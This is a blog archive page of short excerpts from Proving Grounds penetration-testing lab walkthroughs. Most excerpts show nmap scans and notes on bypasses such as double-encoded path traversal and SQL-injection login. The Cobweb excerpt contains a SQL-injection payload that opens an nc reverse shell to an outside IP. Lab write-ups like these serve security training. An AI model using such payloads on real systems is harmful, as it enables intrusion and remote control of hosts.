2024 年 11月随笔档案 - WSssSW

ChatRoom pg walkthrough Intermediate

摘要：NMAP ┌──(root㉿kali)-[~/lab] └─# nmap -p- -A 192.168.189.110 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-30 00:22 UTC Nmap scan report for 19 阅读全文

posted @ 2024-11-30 11:07 WSssSW 阅读(20) 评论(0) 推荐(0) 编辑

BackupBuddy pg walkthrough Intermediate

摘要：nmap ┌──(root㉿kali)-[~/lab] └─# nmap -p- -A 192.168.189.43 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-29 02:10 UTC Stats: 0:00:17 elapsed; 阅读全文

posted @ 2024-11-29 13:31 WSssSW 阅读(6) 评论(0) 推荐(0) 编辑

Dibble pg walkthrough Intermediate

posted @ 2024-11-28 10:41 WSssSW 阅读(15) 评论(0) 推荐(0) 编辑

Spaghetti pg walkthrough Intermediate

摘要：nmap ┌──(root㉿kali)-[~] └─# nmap -p- -A 192.168.170.160 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-27 04:45 UTC Nmap scan report for 192.16 阅读全文

posted @ 2024-11-27 17:29 WSssSW 阅读(23) 评论(0) 推荐(0) 编辑

Rookie Mistake pg walkthrough Intermediate jwt+ssti

摘要：nmap ┌──(root㉿kali)-[~/lab] └─# nmap -p- -A 192.168.189.221 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-26 00:11 UTC Stats: 0:01:03 elapsed; 阅读全文

posted @ 2024-11-26 14:10 WSssSW 阅读(14) 评论(0) 推荐(0) 编辑

Fractal pg walkthrough Easy

摘要：nmap ┌──(root㉿kali)-[~] └─# nmap -p- -A 192.168.157.233 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-25 07:59 UTC Nmap scan report for 192.16 阅读全文

posted @ 2024-11-26 00:14 WSssSW 阅读(10) 评论(0) 推荐(0) 编辑

Hetemit pg walkthrough Intermediate

摘要：nmap ┌──(root㉿kali)-[~] └─# nmap -p- -A 192.168.157.117 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-25 04:32 UTC Stats: 0:00:55 elapsed; 0 h 阅读全文

posted @ 2024-11-25 15:37 WSssSW 阅读(5) 评论(0) 推荐(0) 编辑

Fanatastic pg walkthrough 10 Easy

摘要：nmap 发现9090 22 和3000端口发现漏洞但是不知道还能读到哪些敏感文件 hacktricks 看看 https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/grafana 通过hacktricks告阅读全文

posted @ 2024-11-24 11:34 WSssSW 阅读(8) 评论(0) 推荐(0) 编辑

Exfiltrated pg walkthrough Easy

摘要：80端口弱口令admin admin 发现cms 搜索exp 发现漏洞 https://www.exploit-db.com/exploits/49876 找到敏感数据库密码和用户 ╔══════════╣ Searching passwords in config PHP files /var/w 阅读全文

posted @ 2024-11-22 17:35 WSssSW 阅读(7) 评论(0) 推荐(0) 编辑

Hub PG walkthrough Easy

摘要：刚刚做了一个太难得简直看不懂现在来做个简单的找回信心 nmap ┌──(root㉿kali)-[/home/ftpuserr] └─# nmap -p- -A 192.168.132.25 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11- 阅读全文

posted @ 2024-11-22 11:53 WSssSW 阅读(18) 评论(0) 推荐(0) 编辑

Jordak pg walkthrough Intermediate

摘要：NMAP ┌──(root㉿kali)-[/home/ftpuserr] └─# nmap -p- -A 192.168.226.109 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-21 05:44 UTC Nmap scan repo 阅读全文

posted @ 2024-11-21 17:36 WSssSW 阅读(54) 评论(0) 推荐(0) 编辑

XposedAPI pg walkthrough Intermediate

摘要：nmap ┌──(root㉿kali)-[~/lab] └─# nmap -p- -A 192.168.226.134 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-21 04:52 UTC Stats: 0:00:49 elapsed; 阅读全文

posted @ 2024-11-21 13:44 WSssSW 阅读(15) 评论(0) 推荐(0) 编辑

Readys pg walkthrough Intermediate

摘要：nmap ┌──(root㉿kali)-[~] └─# nmap -p- -A 192.168.175.166 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-20 04:41 UTC Nmap scan report for 192.16 阅读全文

posted @ 2024-11-20 16:11 WSssSW 阅读(11) 评论(0) 推荐(0) 编辑

Bottleup pg walkthrough Intermediate

摘要：一开始看到page=view/.html的时候就想到目录穿越了尝试../../../../../../../../../../../etc/passwd 发现不行找半天其他可能存在漏洞的地方又找不到卡壳了看了看hints 他告诉我存在二次编码绕过这点确实没想到可以进行两次url编码再访问/ 阅读全文

posted @ 2024-11-19 10:54 WSssSW 阅读(12) 评论(0) 推荐(0) 编辑

Apex pg walkthrough Intermediate

摘要：nmap扫描 ┌──(root㉿kali)-[~] └─# nmap -p- -A 192.168.157.145 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-18 04:47 UTC Nmap scan report for 192. 阅读全文

posted @ 2024-11-18 17:41 WSssSW 阅读(20) 评论(0) 推荐(0) 编辑

Nukem pg walkthrough Intermediate

摘要：nmap 扫描 ┌──(root㉿kali)-[~] └─# nmap -p- -A 192.168.157.105 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-17 12:32 UTC Nmap scan report for 192 阅读全文

posted @ 2024-11-17 23:44 WSssSW 阅读(13) 评论(0) 推荐(0) 编辑

Assignment pg walkthrough Easy 通配符提权变种

摘要：nmap 扫描 ┌──(root㉿kali)-[~] └─# nmap -p- -A 192.168.157.224 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-14 04:18 UTC Stats: 0:00:53 elapsed; 阅读全文

posted @ 2024-11-14 16:33 WSssSW 阅读(35) 评论(0) 推荐(0) 编辑

Zino pg walkthrough Intermediate

摘要：nmap 扫描发现smba共享文件 ┌──(root㉿kali)-[~] └─# nmap -p- -A 192.168.167.64 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-14 00:33 UTC Stats: 0:01:42 阅读全文

posted @ 2024-11-14 10:09 WSssSW 阅读(7) 评论(0) 推荐(0) 编辑

Shiftdel walkthrough Intermediate

摘要：点击查看代码 nmap -p- -A 192.168.167.174 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-12 00:09 UTC Nmap scan report for 192.168.167.174 Host is up 阅读全文

posted @ 2024-11-12 15:57 WSssSW 阅读(60) 评论(0) 推荐(0) 编辑

Cockpit pg walkthrough Intermediate

摘要：nmap 发现两个 web站 80 和 9090 还有 22端口 dirsearch 发现80端口有login.php 登录界面发现没有弱口令测试sql注入测试了一会发现密码 password=' # 就绕过了不过我没搞懂为啥就绕过了要后面拿了root权限才知道登录之后发现密码 jame 阅读全文

posted @ 2024-11-12 15:56 WSssSW 阅读(13) 评论(0) 推荐(0) 编辑

Educated PG walkthrough Intermediate

摘要：nmap 扫到 80 22 dirsearch 扫描发现 ┌──(root㉿kali)-[~] └─# dirsearch -u http://192.168.167.13/ /usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: Dep 阅读全文

posted @ 2024-11-11 15:02 WSssSW 阅读(19) 评论(0) 推荐(0) 编辑

law Intermediate walkthrough pg

摘要：靶场很简单分数只有10分跟平常做的20分的中级靶场比确实简单我拿来放松的算下来30分钟解决战斗 nmap 扫到80端口web界面是个框架搜exp https://www.exploit-db.com/exploits/52023 他的脚本可能有点问题看不到回显我们审脚本直接看到漏洞点所在阅读全文

posted @ 2024-11-10 13:30 WSssSW 阅读(11) 评论(0) 推荐(0) 编辑

Groove Intermediate pg walkthrough

摘要：80端口web站点 dirsearch 没发现啥有用信息感觉就是让我们突破登录框进后台的 https://github.com/ChurchCRM/CRM/issues/137 上网查到默认密码登录后台跟具cms查exp发现有个SQL注入 payload找半天找到一个可以直接sql注入 ht 阅读全文

posted @ 2024-11-09 23:49 WSssSW 阅读(10) 评论(0) 推荐(0) 编辑

PayDay Intermediate

摘要：nmap + dirsearch 发现web站点扫目录 ┌──(root㉿kali)-[/home/ftpuserr] └─# nmap -p- -A 192.168.167.39 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-09 0 阅读全文

posted @ 2024-11-09 20:37 WSssSW 阅读(5) 评论(0) 推荐(0) 编辑

Vanity Intermediate 统配符提权

摘要：nmap扫描 ┌──(root㉿kali)-[~] └─# nmap -p- -A 192.168.167.234 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-09 03:59 UTC Stats: 0:01:22 elapsed; 0 阅读全文

posted @ 2024-11-09 14:53 WSssSW 阅读(5) 评论(0) 推荐(0) 编辑

Cobweb Intermediate pg walkthrough

摘要：源码泄露可以直接看到源码存在sql注入反弹shellpayload http://192.168.167.162/phpinfo%22%20%20union%20select%20'system(%22nc%20-e%20/bin/bash%20192.168.45.250%2080%22);e 阅读全文

posted @ 2024-11-07 20:28 WSssSW 阅读(14) 评论(0) 推荐(0) 编辑

wssw

11 2024 档案

公告

搜索

常用链接

随笔分类

随笔档案

文章分类

阅读排行榜

评论排行榜

推荐排行榜

最新评论